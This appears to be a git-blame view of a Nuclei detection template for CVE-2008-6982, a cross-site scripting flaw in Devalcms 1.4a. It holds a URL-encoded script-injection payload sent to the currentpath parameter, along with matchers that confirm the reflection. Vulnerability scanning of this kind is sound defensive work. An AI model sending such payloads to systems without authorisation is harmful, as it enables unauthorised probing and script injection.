2022-09-21 21:42:27 +00:00
|
|
|
id: CVE-2008-6982
|
2022-08-22 07:17:05 +00:00
|
|
|
|
2022-07-20 08:56:54 +00:00
|
|
|
info:
|
2022-09-21 21:42:27 +00:00
|
|
|
name: Devalcms 1.4a - Cross-Site Scripting
|
2022-07-20 08:56:54 +00:00
|
|
|
author: arafatansari
|
2022-09-21 21:42:27 +00:00
|
|
|
severity: high
|
2022-07-20 08:56:54 +00:00
|
|
|
description: |
|
2022-09-21 21:42:27 +00:00
|
|
|
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
|
2022-07-20 09:12:25 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/6369
|
2022-09-21 21:56:03 +00:00
|
|
|
- http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download
|
2022-10-10 19:22:59 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2008-6982
|
2022-09-21 21:42:27 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 7.2
|
2022-12-02 21:24:17 +00:00
|
|
|
cve-id: CVE-2008-6982
|
2022-12-02 21:40:16 +00:00
|
|
|
cwe-id: CWE-79
|
2022-07-20 09:12:25 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2022-11-29 05:53:51 +00:00
|
|
|
tags: cve,cve2008,devalcms,xss,cms,edb
|
2022-07-20 08:56:54 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-07-20 08:56:54 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2022-07-20 09:12:25 +00:00
|
|
|
- '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
2022-07-20 08:56:54 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-07-20 09:12:25 +00:00
|
|
|
- 'sub menu for: <script>alert(document.domain)</script>'
|
2022-07-20 08:56:54 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2022-07-20 09:07:43 +00:00
|
|
|
- 500
|
2022-09-21 21:42:27 +00:00
|
|
|
|
|
|
|
# Enhanced by md on 2022/09/20
|